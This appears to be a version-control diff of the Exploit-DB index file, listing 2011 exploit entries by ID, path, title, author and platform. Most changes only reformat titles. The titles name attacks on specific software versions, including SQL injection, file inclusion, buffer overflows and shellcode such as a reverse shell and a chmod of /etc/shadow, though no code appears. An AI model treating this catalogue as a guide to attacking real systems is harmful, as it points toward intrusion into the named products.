Exploit",2011-04-01,^Xecuti0N3r,windows,dos,0 -17089,platforms/windows/dos/17089.pl,"GOM Media Player 2.1.6.3499 0Day Buffer overflow/DOS Exploit",2011-04-01,^Xecuti0N3r,windows,dos,0 +17087,platforms/windows/dos/17087.pl,"Real player 14.0.2.633 - 0day Buffer overflow/DOS Exploit",2011-04-01,^Xecuti0N3r,windows,dos,0 +17089,platforms/windows/dos/17089.pl,"GOM Media Player 2.1.6.3499 - 0Day Buffer overflow/DOS Exploit",2011-04-01,^Xecuti0N3r,windows,dos,0 17091,platforms/php/webapps/17091.html,"Allomani E-Store 1.0 - CSRF Vulnerability (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 17092,platforms/php/webapps/17092.html,"Allomani News 1.0 - CSRF Vulnerability (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 17093,platforms/php/webapps/17093.html,"Allomani Movies Library 2.0 - CSRF Vulnerability (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -14876,20 +14874,20 @@ id,file,description,date,author,platform,type,port 17115,platforms/hardware/webapps/17115.txt,"ZO Tech Multiple Print Servers Cross-site Scripting Vulnerability",2011-04-04,b0telh0,hardware,webapps,0 17116,platforms/hardware/webapps/17116.txt,"Longshine Multiple Print Servers Cross-site Scripting Vulnerability",2011-04-04,b0telh0,hardware,webapps,0 17117,platforms/hardware/webapps/17117.txt,"Planet FPS-1101 Cross-site Scripting Vulnerability",2011-04-04,b0telh0,hardware,webapps,0 -17118,platforms/php/webapps/17118.txt,"OpenEMR 4.0.0 Multiple Vulnerabilities",2011-04-05,"AutoSec Tools",php,webapps,0 -17119,platforms/php/webapps/17119.txt,"WordPress WP Custom Pages Plugin 0.5.0.1 LFI Vulnerability",2011-04-05,"AutoSec Tools",php,webapps,0 +17118,platforms/php/webapps/17118.txt,"OpenEMR 4.0.0 - Multiple Vulnerabilities",2011-04-05,"AutoSec Tools",php,webapps,0 +17119,platforms/php/webapps/17119.txt,"Wordpress Plugin Custom Pages 0.5.0.1 - LFI Vulnerability",2011-04-05,"AutoSec Tools",php,webapps,0 17120,platforms/multiple/dos/17120.c,"GNU glibc < 2.12.2 'fnmatch()' Function Stack Corruption Vulnerability",2011-02-25,"Simon Berry-Byrne",multiple,dos,0 17123,platforms/php/webapps/17123.txt,"TutorialMS 1.4 (show) - Remote SQL Injection Vulnerability",2011-04-05,LiquidWorm,php,webapps,0 17124,platforms/windows/local/17124.pl,"MPlayer (r33064 Lite) Buffer Overflow + ROP exploit",2011-04-06,Nate_M,windows,local,0 17125,platforms/php/webapps/17125.txt,"Dream Vision Technologies Web Portal SQL Injection Vulnerability",2011-04-06,eXeSoul,php,webapps,0 17126,platforms/php/webapps/17126.html,"Graugon Forum 1.3 SQL Injection Vulnerability",2011-04-06,"AutoSec Tools",php,webapps,0 -17127,platforms/php/webapps/17127.txt,"eyeOS 2.3 Multiple Vulnerabilities",2011-04-06,"AutoSec Tools",php,webapps,0 -17128,platforms/php/webapps/17128.txt,"GreenPants 0.1.7 Multiple Vulnerabilities",2011-04-06,"Ptrace Security",php,webapps,0 +17127,platforms/php/webapps/17127.txt,"eyeos 2.3 - Multiple Vulnerabilities",2011-04-06,"AutoSec Tools",php,webapps,0 +17128,platforms/php/webapps/17128.txt,"greenpants 0.1.7 - Multiple Vulnerabilities",2011-04-06,"Ptrace Security",php,webapps,0 17129,platforms/php/webapps/17129.txt,"S40 CMS 0.4.2b LFI Vulnerability",2011-04-07,Osirys,php,webapps,0 17132,platforms/php/webapps/17132.py,"Joomla! com_virtuemart <= 1.1.7 - Blind SQL Injection Exploit",2011-04-08,"TecR0c and mr_me",php,webapps,0 17133,platforms/windows/dos/17133.c,"Microsoft Windows xp AFD.sys Local Kernel DoS Exploit",2011-04-08,"Lufeng Li",windows,dos,0 -17134,platforms/php/webapps/17134.txt,"phpCollab 2.5 Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0 -17135,platforms/php/webapps/17135.txt,"Viscacha 0.8.1 Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0 +17134,platforms/php/webapps/17134.txt,"phpcollab 2.5 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0 +17135,platforms/php/webapps/17135.txt,"viscacha 0.8.1 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0 17136,platforms/php/webapps/17136.txt,"Joomla JCE Component (com_jce) Blind SQL Injection Vulnerability",2011-04-09,eidelweiss,php,webapps,0 17137,platforms/php/webapps/17137.txt,"NooMS CMS 1.1.1 - CSRF",2011-04-09,loneferret,php,webapps,0 17140,platforms/multiple/dos/17140.txt,"Libmodplug ReadS3M Stack Overflow",2011-04-09,"SEC Consult",multiple,dos,0 @@ -14907,7 +14905,7 @@ id,file,description,date,author,platform,type,port 17152,platforms/windows/remote/17152.rb,"ManageEngine Applications Manager Authenticated Code Execution",2011-04-08,metasploit,windows,remote,9090 17153,platforms/windows/local/17153.rb,"VeryTools Video Spirit Pro <= 1.70 .visprj Buffer Overflow",2011-04-11,metasploit,windows,local,0 17155,platforms/windows/remote/17155.py,"Cisco Security Agent Management Console ‘st_upload’ RCE Exploit",2011-04-12,"Gerry Eisenhaur",windows,remote,0 -17156,platforms/windows/remote/17156.txt,"OpenText FirstClass Client v 11.005 Code Execution",2011-04-12,"Kyle Ossinger",windows,remote,0 +17156,platforms/windows/remote/17156.txt,"OpenText FirstClass Client 11.005 - Code Execution",2011-04-12,"Kyle Ossinger",windows,remote,0 17157,platforms/windows/local/17157.py,"Wordtrainer 3.0 .ORD File Buffer Overflow Vulnerability",2011-04-12,"C4SS!0 G0M3S",windows,local,0 17158,platforms/windows/local/17158.txt,"Microsoft HTML Help <= 6.1 Stack Overflow",2011-04-12,"Luigi Auriemma",windows,local,0 17159,platforms/windows/dos/17159.txt,"Microsoft Host Integration Server <= 8.5.4224.0 DoS Vulnerabilities",2011-04-12,"Luigi Auriemma",windows,dos,0 @@ -14930,13 +14928,13 @@ id,file,description,date,author,platform,type,port 17178,platforms/php/webapps/17178.txt,"Blue Hat Sensitive Database Disclosure Vulnerability SQLi",2011-04-16,^Xecuti0N3r,php,webapps,0 17179,platforms/php/webapps/17179.txt,"Bedder CMS Blind SQL Injection Vulnerability",2011-04-16,^Xecuti0N3r,php,webapps,0 17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS SQL Injection Vulnerability",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0 -17181,platforms/linux/remote/17181.pl,"FiSH-irssi v0.99 Evil ircd Buffer Overflow (CVE-2007-1397)",2011-04-17,"Caleb James DeLisle",linux,remote,0 +17181,platforms/linux/remote/17181.pl,"FiSH-irssi 0.99 - Evil ircd Buffer Overflow (CVE-2007-1397)",2011-04-17,"Caleb James DeLisle",linux,remote,0 17183,platforms/php/webapps/17183.txt,"osPHPSite SQL Injection Vulnerability",2011-04-17,vir0e5,php,webapps,0 17185,platforms/windows/local/17185.py,"Wireshark 1.4.1-1.4.4 SEH Overflow Exploit",2011-04-18,sickness,windows,local,0 17186,platforms/windows/local/17186.rb,"Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow",2011-04-19,metasploit,windows,local,0 17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53 .64 Action Script Type Confusion Exploit (DEP+ASLR bypass)",2011-04-19,Abysssec,windows,remote,0 17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0 -17190,platforms/php/webapps/17190.txt,"Dalbum 1.43 Multiple Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0 +17190,platforms/php/webapps/17190.txt,"dalbum 1.43 - Multiple Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0 17191,platforms/php/webapps/17191.txt,"Ultimate eShop Error Based SQL Injection Vulnerability",2011-04-20,Romka,php,webapps,0 17192,platforms/php/webapps/17192.html,"docuFORM Mercury WebApp 6.16a/5.20 Multiple XSS Vulnerabilities",2011-04-20,LiquidWorm,php,webapps,0 17193,platforms/php/webapps/17193.html,"SocialCMS1.0.2 Multiple CSRF Vulnerabilities",2011-04-20,vir0e5,php,webapps,0 @@ -14944,29 +14942,29 @@ id,file,description,date,author,platform,type,port 17195,platforms/windows/remote/17195.rb,"Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow",2011-04-19,metasploit,windows,remote,0 17196,platforms/windows/local/17196.html,"Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)",2011-04-21,LiquidWorm,windows,local,0 17197,platforms/php/webapps/17197.txt,"First Escort Marketing CMS Multiple SQL Injection Vunerabilities",2011-04-22,NoNameMT,php,webapps,0 -17198,platforms/php/webapps/17198.txt,"360 Web Manager 3.0 Multiple vulnerabilities",2011-04-22,"Ignacio Garrido",php,webapps,0 +17198,platforms/php/webapps/17198.txt,"360 Web Manager 3.0 - Multiple Vulnerabilities",2011-04-22,"Ignacio Garrido",php,webapps,0 17199,platforms/unix/remote/17199.rb,"Spreecommerce < 0.50.0 Arbitrary Command Execution",2011-04-21,metasploit,unix,remote,0 17200,platforms/php/webapps/17200.txt,"ZenPhoto 1.4.0.3 x-forwarded-for HTTP Header presisitent XSS",2011-04-22,Saif,php,webapps,0 17201,platforms/multiple/dos/17201.php,"PHP phar extension 1.1.1 Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos,0 -17202,platforms/php/webapps/17202.txt,"Dolibarr ERP/CRM 3.0.0 Multiple Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0 +17202,platforms/php/webapps/17202.txt,"Dolibarr ERP/CRM 3.0.0 - Multiple Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0 17203,platforms/php/webapps/17203.txt,"Web2Project 2.3 SQL Injection Vulnerability",2011-04-22,"AutoSec Tools",php,webapps,0 17204,platforms/php/webapps/17204.txt,"DynMedia Pro Web CMS 4.0 Local File Disclosure",2011-04-22,Mbah_Semar,php,webapps,0 -17205,platforms/php/webapps/17205.txt,"4images 1.7.9 Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 +17205,platforms/php/webapps/17205.txt,"4images 1.7.9 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 17206,platforms/php/webapps/17206.txt,"Realmarketing CMS Multiple SQL Injection Vulnerabilities",2011-04-22,^Xecuti0N3r,php,webapps,0 -17207,platforms/php/webapps/17207.txt,"Ajax Category Dropdown Wordpress Plugin 0.1.5 Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 +17207,platforms/php/webapps/17207.txt,"ajax category dropdown wordpress plugin 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 17209,platforms/php/webapps/17209.txt,"SoftMP3 SQL Injection Vulnerability",2011-04-24,mArTi,php,webapps,0 17210,platforms/windows/local/17210.rb,"eZip Wizard 3.0 Stack Buffer Overflow",2011-04-25,metasploit,windows,local,0 17211,platforms/php/webapps/17211.txt,"mySeatXT 0.1781 SQL Injection Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0 17212,platforms/php/webapps/17212.txt,"OrangeHRM 2.6.3 (PluginController.php) Local File Inclusion Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0 -17213,platforms/php/webapps/17213.txt,"phpMyChat Plus 1.93 Multiple Vulnerabilities",2011-04-25,"AutoSec Tools",php,webapps,0 +17213,platforms/php/webapps/17213.txt,"phpmychat plus 1.93 - Multiple Vulnerabilities",2011-04-25,"AutoSec Tools",php,webapps,0 17214,platforms/php/webapps/17214.php,"WordPress SermonBrowser Plugin 0.43 SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 17215,platforms/hardware/webapps/17215.txt,"Snom IP Phone Web Interface < 8 - Multiple Vulnerabilities",2011-04-26,"Yakir Wizman",hardware,webapps,0 17216,platforms/php/webapps/17216.txt,"Quick.CMS 3.0 - CSRF Vulnerabilities",2011-04-26,^Xecuti0N3r,php,webapps,0 17217,platforms/windows/local/17217.py,"Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow Exploit",2011-04-27,"Brandon Murphy",windows,local,0 -17218,platforms/php/webapps/17218.txt,"Symphony CMS 2.1.2 Blind SQL Injection",2011-04-27,Wireghoul,php,webapps,0 +17218,platforms/php/webapps/17218.txt,"Symphony CMS 2.1.2 - Blind SQL Injection",2011-04-27,Wireghoul,php,webapps,0 17219,platforms/windows/remote/17219.rb,"EMC HomeBase Server Directory Traversal Remote Code Execution",2011-04-27,metasploit,windows,remote,18821 -17220,platforms/php/webapps/17220.txt,"eyeOS <= 1.9.0.2 Stored XSS Vulnerability Using Image Files",2011-04-28,"Alberto Ortega",php,webapps,0 -17221,platforms/php/webapps/17221.txt,"Kusaba X <= 0.9.1 Multiple Vulnerabilities",2011-04-28,"Emilio Pinna",php,webapps,0 +17220,platforms/php/webapps/17220.txt,"eyeos <= 1.9.0.2 - Stored XSS vulnerability using image files",2011-04-28,"Alberto Ortega",php,webapps,0 +17221,platforms/php/webapps/17221.txt,"kusaba x <= 0.9.1 - Multiple Vulnerabilities",2011-04-28,"Emilio Pinna",php,webapps,0 17222,platforms/linux/dos/17222.c,"libmodplug <= 0.8.8.2 .abc Stack-Based Buffer Overflow PoC",2011-04-28,epiphant,linux,dos,0 17223,platforms/windows/local/17223.pl,"NetOp Remote Control 8.0, 9.1, 9.2, 9.5 Buffer Overflow",2011-04-28,chap0,windows,local,0 17224,platforms/osx/shellcode/17224.s,"OSX/Intel reverse_tcp shell x86_64 - 131 bytes",2011-04-29,hammackj,osx,shellcode,0 @@ -14986,14 +14984,14 @@ id,file,description,date,author,platform,type,port 17242,platforms/asp/webapps/17242.txt,"Sothink DHTML Menu SQL Injection Vulnerability",2011-05-04,Caddy-Dz,asp,webapps,0 17243,platforms/windows/remote/17243.txt,"SPlayer <= 3.7 (build 2055) Buffer Overflow Exploit",2011-05-04,xsploitedsec,windows,remote,0 17244,platforms/hardware/remote/17244.txt,"ZyWALL USG Appliance Multiple Vulnerabilities",2011-05-04,"RedTeam Pentesting",hardware,remote,0 -17248,platforms/php/webapps/17248.txt,"PHPDug 2.0.0 Multiple Vulnerabilities",2011-05-06,"High-Tech Bridge SA",php,webapps,0 +17248,platforms/php/webapps/17248.txt,"PHPDug 2.0.0 - Multiple Vulnerabilities",2011-05-06,"High-Tech Bridge SA",php,webapps,0 17250,platforms/php/webapps/17250.txt,"phpThumb 'phpThumbDebug' Information Disclosure",2011-05-06,mook,php,webapps,0 17251,platforms/php/webapps/17251.html,"VCalendar 1.1.5 CSRF Vulnerability",2011-05-06,"High-Tech Bridge SA",php,webapps,0 17252,platforms/windows/remote/17252.rb,"VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow",2011-04-08,metasploit,windows,remote,0 -17259,platforms/cgi/webapps/17259.txt,"f-fileman 7.0 Directory Traversal Vulnerability",2011-05-07,"Raffaele Forte",cgi,webapps,0 +17259,platforms/cgi/webapps/17259.txt,"f-fileman 7.0 - Directory Traversal vulnerability",2011-05-07,"Raffaele Forte",cgi,webapps,0 17264,platforms/php/webapps/17264.txt,"Joomla Component com_versioning SQLi Vulnerability",2011-05-09,the_cyber_nuxbie,php,webapps,0 17265,platforms/php/webapps/17265.txt,"Joomla Component com_hello SQL Injection Vulnerability",2011-05-09,the_cyber_nuxbie,php,webapps,0 -17266,platforms/windows/dos/17266.txt,"Serva32 1.2.00 RC1 Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",windows,dos,0 +17266,platforms/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",windows,dos,0 17267,platforms/php/webapps/17267.txt,"Traidnt UP (view.php) SQL Injection Vulnerability",2011-05-10,ScOrPiOn,php,webapps,0 17268,platforms/windows/remote/17268.rb,"SPlayer 3.7 Content-Type Buffer Overflow",2011-05-11,metasploit,windows,remote,0 17269,platforms/windows/remote/17269.rb,"ICONICS WebHMI ActiveX Buffer Overflow",2011-05-10,metasploit,windows,remote,0 @@ -15002,7 +15000,7 @@ id,file,description,date,author,platform,type,port 17274,platforms/windows/dos/17274.txt,"SlimPDF Reader PoC",2011-05-12,"Nicolas Krassas",windows,dos,0 17275,platforms/windows/local/17275.pl,"A-PDF All to MP3 Converter 2.0.0 DEP Bypass",2011-05-12,h1ch4m,windows,local,0 17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0 -17277,platforms/windows/local/17277.pl,"A-PDF Wav to MP3 Converter v 1.2.0 DEP Bypass",2011-05-13,h1ch4m,windows,local,0 +17277,platforms/windows/local/17277.pl,"A-PDF Wav to MP3 Converter 1.2.0 - DEP Bypass",2011-05-13,h1ch4m,windows,local,0 17278,platforms/windows/dos/17278.pl,"Adobe Audition 3.0 (build 7283) Session File Handling Buffer Overflow PoC",2011-05-13,LiquidWorm,windows,dos,0 17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) Arbitrary File Download Vulnerability",2011-05-13,LiquidWorm,hardware,remote,0 17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress plugin (FCKeditor) Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0 @@ -15016,7 +15014,7 @@ id,file,description,date,author,platform,type,port 17293,platforms/php/webapps/17293.txt,"Media In Spot CMS SQL Injection Vulnerability",2011-05-16,"Iolo Morganwg",php,webapps,0 17294,platforms/windows/local/17294.py,"CoolPlayer Portable 2.19.2 Buffer Overflow",2011-05-16,sinfulsecurity,windows,local,0 17295,platforms/php/webapps/17295.txt,"Vanilla Forum 2.0.17.9 LFI Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0 -17296,platforms/php/webapps/17296.txt,"NoticeBoardPro 1.0 Multiple Vulnerabilities",2011-05-16,"AutoSec Tools",php,webapps,0 +17296,platforms/php/webapps/17296.txt,"NoticeBoardPro 1.0 - Multiple Vulnerabilities",2011-05-16,"AutoSec Tools",php,webapps,0 17297,platforms/php/webapps/17297.txt,"Jcow 4.2.1 LFI Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0 17298,platforms/netware/dos/17298.txt,"Novell Netware eDirectory DoS Vulnerability",2011-05-16,nSense,netware,dos,0 17299,platforms/php/webapps/17299.txt,"Wordpress Plugin Is-human <= 1.4.2- Remote Command Execution Vulnerability",2011-05-17,neworder,php,webapps,0 @@ -15031,23 +15029,23 @@ id,file,description,date,author,platform,type,port 17308,platforms/php/webapps/17308.txt,"Zen Cart <= 1.3.9h - Multiple Vulnerabilities",2011-05-20,"Dr. Alberto Fontanella",php,webapps,0 17309,platforms/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass - SO-11-007",2011-05-20,"Sense of Security",php,webapps,0 17311,platforms/php/webapps/17311.txt,"E-Manage MySchool 7.02 SQL Injection Vulnerability",2011-05-21,az7rb,php,webapps,0 -17312,platforms/php/webapps/17312.txt,"Tugux CMS 1.2 Multiple Remote Vulnerabilities",2011-05-22,LiquidWorm,php,webapps,0 +17312,platforms/php/webapps/17312.txt,"tugux cms 1.2 Multiple Vulnerabilities",2011-05-22,LiquidWorm,php,webapps,0 17313,platforms/windows/local/17313.rb,"Magix Musik Maker 16 .mmm Stack Buffer Overflow",2011-05-22,metasploit,windows,local,0 -17314,platforms/php/webapps/17314.txt,"vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability",2011-05-23,D4rkB1t,php,webapps,0 +17314,platforms/php/webapps/17314.txt,"vBulletin 4.0.x => 4.1.2 - (search.php) SQL Injection Vulnerability",2011-05-23,D4rkB1t,php,webapps,0 17316,platforms/php/webapps/17316.txt,"PHPortfolio SQL Injection Vulnerbility",2011-05-23,lionaneesh,php,webapps,0 17317,platforms/windows/local/17317.rb,"VisiWave VWR File Parsing Trusted Pointer Vulnerability",2011-05-23,metasploit,windows,local,0 17318,platforms/multiple/local/17318.php,"PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability",2011-05-25,"Marek Kroemeke",multiple,local,0 17319,platforms/php/webapps/17319.txt,"Tickets 2.13 SQL Injection Vulnerability",2011-05-25,"AutoSec Tools",php,webapps,0 17320,platforms/php/webapps/17320.txt,"i-doIT 0.9.9-4 LFI Vulnerability",2011-05-25,"AutoSec Tools",php,webapps,0 17321,platforms/php/webapps/17321.txt,"ExtCalendar 2.0b2 (cal_search.php) SQL Injection Vulnerability",2011-05-25,"High-Tech Bridge SA",php,webapps,0 -17322,platforms/php/webapps/17322.txt,"eGroupware 1.8.001.20110421 Multiple Vulnerabilities",2011-05-25,"AutoSec Tools",php,webapps,0 +17322,platforms/php/webapps/17322.txt,"egroupware 1.8.001.20110421 - Multiple Vulnerabilities",2011-05-25,"AutoSec Tools",php,webapps,0 17323,platforms/windows/shellcode/17323.c,"Allwin WinExec add new local administrator + ExitProcess Shellcode",2011-05-25,RubberDuck,windows,shellcode,0 17324,platforms/php/webapps/17324.rb,"AWStats Totals <= 1.14 multisort - Remote Command Execution",2011-05-25,metasploit,php,webapps,0 17325,platforms/php/webapps/17325.py,"Clipbucket 2.4 RC2 645 SQL Injection Vulnerability",2011-05-26,"AutoSec Tools",php,webapps,0 17326,platforms/windows/shellcode/17326.rb,"DNS Reverse Download and Exec Shellcode",2011-05-26,"Alexey Sintsov",windows,shellcode,0 17327,platforms/php/webapps/17327.txt,"HB Ecommerce SQL Injection Vulnerability",2011-05-27,takeshix,php,webapps,0 17328,platforms/windows/remote/17328.html,"Magneto ICMP ActiveX 4.0.0.20 - ICMPSendEchoRequest Remote Code Execute",2011-05-27,boahat,windows,remote,0 -17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 .mmm Stack Buffer Overflow (w/o egg-hunter)",2011-05-27,"Alexey Sintsov",windows,local,0 +17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - .mmm Stack Buffer Overflow (without egg-hunter)",2011-05-27,"Alexey Sintsov",windows,local,0 17330,platforms/php/webapps/17330.html,"cPanel < 11.25 CSRF - Add User php Script",2011-05-27,ninjashell,php,webapps,0 17335,platforms/php/webapps/17335.txt,"Duhok Forum 1.1 SQL Injection Vulnerability",2011-05-28,M.Jock3R,php,webapps,0 17336,platforms/php/webapps/17336.txt,"Guru Penny Auction Pro 3.0 - Blind SQL Injection Vulnerability",2011-05-28,v3n0m,php,webapps,0 @@ -15086,31 +15084,31 @@ id,file,description,date,author,platform,type,port 17378,platforms/php/webapps/17378.py,"Pacer Edition CMS 2.1 (rm) Remote Arbitrary File Deletion Exploit",2011-06-10,LiquidWorm,php,webapps,0 17379,platforms/php/webapps/17379.txt,"Pacer Edition CMS 2.1 (l param) Local File Inclusion Vulnerability",2011-06-10,LiquidWorm,php,webapps,0 17380,platforms/php/webapps/17380.txt,"Angora Guestbook 1.5 Local File Inclusion",2011-06-10,"AutoSec Tools",php,webapps,0 -17381,platforms/windows/remote/17381.txt,"Simple web-server 1.2 Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote,0 +17381,platforms/windows/remote/17381.txt,"simple web-server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote,0 17382,platforms/windows/webapps/17382.txt,"Tele Data Contact Management Server Directory Traversal",2011-06-10,"AutoSec Tools",windows,webapps,0 17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit (Win7 + ASLR bypass mod)",2011-06-11,xsploitedsec,windows,local,0 17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow vulnerability",2011-06-11,huimaozi,windows,dos,0 -17388,platforms/windows/webapps/17388.txt,"Trend Micro Data Loss Prevention Virtual Appliance 5.5 Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps,0 -17389,platforms/php/webapps/17389.py,"Technote 7.2 Blind SQL Injection Vulnerability",2011-06-11,BlueH4G,php,webapps,0 +17388,platforms/windows/webapps/17388.txt,"trend micro data loss prevention virtual appliance 5.5 - Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps,0 +17389,platforms/php/webapps/17389.py,"Technote 7.2 - Blind SQL Injection Vulnerability",2011-06-11,BlueH4G,php,webapps,0 17390,platforms/php/webapps/17390.txt,"SUBRION CMS Multiple Vulnerabilities",2011-06-11,"Karthik R",php,webapps,0 17391,platforms/linux/local/17391.c,"DEC Alpha Linux <= 3.0 Local Root Exploit",2011-06-11,"Dan Rosenberg",linux,local,0 17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager POST Query Buffer Overflow",2011-06-12,metasploit,windows,remote,0 17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0 17394,platforms/php/webapps/17394.txt,"Scriptegrator plugin for Joomla! 1.5 0day File Inclusion Vulnerability",2011-06-13,jdc,php,webapps,0 -17395,platforms/php/webapps/17395.txt,"CubeCart 2.0.7 Multiple Vulnerabilities",2011-06-14,Shamus,php,webapps,0 +17395,platforms/php/webapps/17395.txt,"cubecart 2.0.7 - Multiple Vulnerabilities",2011-06-14,Shamus,php,webapps,0 17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 Remote Crash",2011-06-14,echo,windows,dos,0 17398,platforms/windows/dos/17398.txt,"Windows Media Player with K-Lite Codec Pack DoS PoC",2011-06-14,"Nicolas Krassas",windows,dos,0 17399,platforms/windows/dos/17399.txt,"Microsoft Office XP Remote code Execution",2011-06-14,"Francis Provencher",windows,dos,0 17400,platforms/linux/dos/17400.c,"Conky Linux 1.8.0 Local DoS/PoC Exploit",2011-06-14,"Arturo D'Elia",linux,dos,0 17401,platforms/windows/dos/17401.txt,"MS HyperV Persistent DoS Vulnerability",2011-06-14,"Core Security",windows,dos,0 17402,platforms/php/webapps/17402.txt,"AMHSHOP 3.7.0 SQL Injection",2011-06-15,"Yassin Aboukir",php,webapps,0 -17403,platforms/php/webapps/17403.txt,"Free Simple CMS 1.0 Multiple Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0 +17403,platforms/php/webapps/17403.txt,"Free Simple CMS 1.0 - Multiple Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0 17404,platforms/multiple/webapps/17404.txt,"IBM WebSphere Application Server 7.0.0.13 CSRF Vulnerability",2011-06-15,"Core Security",multiple,webapps,0 17405,platforms/windows/dos/17405.txt,"Adobe Reader/Acrobat 10.0.1 DoS Exploit",2011-06-16,"Soroush Dalili",windows,dos,0 17406,platforms/php/webapps/17406.txt,"Catalog Builder - Ecommerce Software - Blind SQL Injection",2011-06-16,takeshix,php,webapps,0 17408,platforms/php/webapps/17408.txt,"WeBid 1.0.2 persistent XSS via SQL Injection",2011-06-17,Saif,php,webapps,0 17409,platforms/windows/remote/17409.rb,"MS11-050 IE mshtml!CObjectElement Use After Free",2011-06-17,metasploit,windows,remote,0 -17410,platforms/php/webapps/17410.txt,"AiCart 2.0 Multiple Vulnerabilities",2011-06-18,takeshix,php,webapps,0 +17410,platforms/php/webapps/17410.txt,"AiCart 2.0 - Multiple Vulnerabilities",2011-06-18,takeshix,php,webapps,0 17411,platforms/php/webapps/17411.txt,"A Cool Debate 1.0.3 Component Joomla Local File Inclusion",2011-06-18,"Chip D3 Bi0s",php,webapps,0 17412,platforms/php/webapps/17412.txt,"Joomla Component (com_team) SQL Injection Vulnerability",2011-06-19,CoBRa_21,php,webapps,0 17413,platforms/php/webapps/17413.txt,"Burning Board 3.1.5 Full Path Disclosure",2011-06-19,linc0ln.dll,php,webapps,0 @@ -15125,23 +15123,23 @@ id,file,description,date,author,platform,type,port 17423,platforms/php/webapps/17423.txt,"WPtouch WordPress Plugin 1.9.27 URL redirection",2011-06-21,MaKyOtOx,php,webapps,0 17424,platforms/windows/remote/17424.rb,"Black Ice Cover Page ActiveX Control Arbitrary File Download",2011-06-21,metasploit,windows,remote,0 17426,platforms/php/webapps/17426.txt,"iGiveTest 2.1.0 SQL Injection Vulnerability",2011-06-21,"Brendan Coles",php,webapps,0 -17428,platforms/php/webapps/17428.txt,"Cachelogic Expired Domains Script 1.0 Multiple Vulnerabilities",2011-06-22,"Brendan Coles",php,webapps,0 +17428,platforms/php/webapps/17428.txt,"Cachelogic Expired Domains Script 1.0 - Multiple Vulnerabilities",2011-06-22,"Brendan Coles",php,webapps,0 17429,platforms/windows/remote/17429.rb,"FactoryLink vrn.exe Opcode 9 Buffer Overflow",2011-06-21,metasploit,windows,remote,0 17430,platforms/windows/remote/17430.rb,"Sielco Sistemi Winlog Buffer Overflow",2011-06-21,metasploit,windows,remote,0 17431,platforms/php/webapps/17431.txt,"Same Team E-shop manager SQL Injection exploit",2011-06-22,"Number 7",php,webapps,0 17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH - sh4 - setuid(0) - chmod(""/etc/shadow"", 0666) - exit(0) - 43 bytes",2011-06-22,"Jonathan Salwan",sh4,shellcode,0 17434,platforms/windows/remote/17434.rb,"RealWin SCADA Server DATAC Login Buffer Overflow",2011-06-22,metasploit,windows,remote,0 -17435,platforms/php/webapps/17435.txt,"BrewBlogger 2.3.2 Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0 +17435,platforms/php/webapps/17435.txt,"brewblogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0 17436,platforms/php/webapps/17436.txt,"iSupport 1.8 SQL Injection Vulnerability",2011-06-23,"Brendan Coles",php,webapps,0 